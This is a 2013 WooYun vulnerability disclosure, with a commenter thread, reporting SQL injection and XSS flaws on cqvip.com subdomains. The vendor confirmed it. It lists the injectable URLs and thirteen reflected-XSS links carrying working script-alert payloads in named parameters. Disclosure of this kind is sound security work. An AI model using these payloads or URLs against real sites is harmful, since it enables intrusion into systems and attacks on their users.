当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033308

漏洞标题:维普网SQL注入及xss漏洞礼包

相关厂商:cqvip.com

漏洞作者: Spid3r

提交时间:2013-08-06 10:40

修复时间:2013-09-20 10:41

公开时间:2013-09-20 10:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-06: 细节已通知厂商并且等待厂商处理中
2013-08-09: 厂商已经确认,细节仅向厂商公开
2013-08-19: 细节向核心白帽子及相关领域专家公开
2013-08-29: 细节向普通白帽子公开
2013-09-08: 细节向实习白帽子公开
2013-09-20: 细节向公众公开

简要描述:

虽然我知道厂商会主动忽略的.但是为了那些学术论文的贞操我还是硬着头皮来了~

详细说明:

SQL注入2枚:
http://ipub.cqvip.com/Shop/PackDetail.aspx?id=1FB8D1334B684E9391600E93A6B59629
http://vipblog.cqvip.com/user1/2545585/cmd.asp?uid=2545585&do=labdetail&Lab_lngID=195
存储XSS3枚:
http://mechnet.cqvip.com/asp/vipsearch.asp
http://2010.cqvip.com/asp/vipsearch.asp
http://lib.cqvip.com/zk/search.aspx
反射XSS13枚:
http://www.cqvip.com/ajax/user.aspx?action=lf&ft=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://ipub.cqvip.com/main/search.aspx?k=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://ipub.cqvip.com/ajax/user.aspx?action=lf&ft=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://club.cqvip.com/showforum.aspx?forumid=654&filter=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://club.cqvip.com/showforum.aspx?search=1&forumid=654&typeid=0&filter=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&order=2
http://oldweb.cqvip.com/loginn.asp?HURL=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://uniondownpaper.cqvip.com/download/login.asp?id=http://oldweb.cqvip.com/loginn.asp?HURL=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://2010.cqvip.com/asp/download.asp?dwNo=&Prev=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Order=&Next=&ZJ=&Flag=&SUID=
http://club.cqvip.com/showuser.aspx?orderby=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&ordertype=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&page=2
http://2010.cqvip.com/asp/favorites.asp?title=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://2010.cqvip.com/qk/98592C/target=_blank%20href=http://my.cqvip.com/CustomMagazine.asp?action=modi&gch=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://bbs.cqvip.com/showtopiclist.aspx?search=1&type=digest&newtopic=600&order=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&direct=&forumid=-1&forums=&page=2
http://oldweb.cqvip.com/asp/SearchZK.asp?T=1&E=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

漏洞证明:

SQL注入:

2.jpg


3.jpg


XSS的就不上图了,访问就弹

修复方案:

虽然厂商是一个盈利机构,可能对安全也不会太重视.
不过希望厂商为了更好的发展还是花些时间补下吧~ : )

版权声明:转载请注明来源 Spid3r@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-08-09 15:27

厂商回复:

感谢白帽的辛苦

最新状态:

暂无

漏洞评价:

评论

  1. 2013-08-08 20:00 | 雨夜 ( 普通白帽子 | Rank:207 漏洞数:30 | 别和我谈感情,太伤钱……)

    常桑不确认就发礼物

  2. 2013-08-08 21:47 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @雨夜 是啊... 而且还电话联系我问我要什么礼物~ 真心好厂商!

  3. 2013-08-09 11:42 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    @Spid3r 我的维普为啥走小漏洞流程

  4. 2013-08-09 12:15 | 雨夜 ( 普通白帽子 | Rank:207 漏洞数:30 | 别和我谈感情,太伤钱……)

    @Spid3r 有必要教教厂商怎么确认漏洞……

  5. 2013-08-09 12:37 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @霍大然 估计你那2枚注射和我的都重了...

  6. 2013-08-09 13:04 | 雨夜 ( 普通白帽子 | Rank:207 漏洞数:30 | 别和我谈感情,太伤钱……)

    @Spid3r 这站注射太多了,找不过来

  7. 2013-08-09 13:51 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    @Spid3r 给你发了啥礼物?我是冲着礼物来的

  8. 2013-08-09 14:04 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @霍大然 他开始电话联系我说给我会员 然后我说不要,我说给我2本实体书吧~

  9. 2013-08-09 14:15 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    我还以为起码给个u盘啥的

  10. 2013-08-09 15:58 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @霍大然 基友 我想弱弱的问一下你的rank打折了吗? 你2个注射就24rank啊... 我打包的这么多才12表示默默的不爽 - -

  11. 2013-08-09 15:59 | 雨夜 ( 普通白帽子 | Rank:207 漏洞数:30 | 别和我谈感情,太伤钱……)

    @Spid3r 话说我这还有一大把注射呢,我也一个一个发……

  12. 2013-08-09 16:02 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @雨夜 - - 这样连载刷rank表示有点不厚道... 话说你的rank打折了没呢?

  13. 2013-08-09 16:03 | 雨夜 ( 普通白帽子 | Rank:207 漏洞数:30 | 别和我谈感情,太伤钱……)

    @Spid3r 当然……

  14. 2013-08-09 16:06 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @雨夜 那你10rank打折后变成了多少?

  15. 2013-08-09 16:08 | 雨夜 ( 普通白帽子 | Rank:207 漏洞数:30 | 别和我谈感情,太伤钱……)

    @Spid3r 4

  16. 2013-08-09 16:09 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    @Spid3r 哥一个站4分,两个8分

  17. 2013-08-09 16:09 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @雨夜 额 - - 这样的话我心里还平静些了,我的rank没有打折...打包还是有打包的好处

  18. 2013-08-09 16:11 | 雨夜 ( 普通白帽子 | Rank:207 漏洞数:30 | 别和我谈感情,太伤钱……)

    @Spid3r 卧槽,这不是小厂商所以打折么,我也打包的嘛 @xsser 太欺负人了

  19. 2013-08-09 16:12 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    @Spid3r 我是一个站提交一个,应该没有和你的重复,我一般不看主站:),2个站总共8分,你心理平衡了吧

  20. 2013-08-09 16:13 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @雨夜 凭良心办事,有时候也要看质量和数量 - -

  21. 2013-08-09 16:14 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    疯狗说这是二级厂商,要打折,另外,为啥就没问我要什么礼物,难道就给个号

  22. 2013-08-09 16:19 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    @霍大然 厂商是个官方机构,办事效率你懂的。我的礼物还不知道要到什么时候呢 - - 连载和打包的不同而已,如果你很多一起打包相信也会不给你打折的 基友你说呢.

  23. 2013-08-09 16:20 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    @Spid3r 经常被打折,无所谓了,参考:http://www.wooyun.org/notice.php?action=view&id=28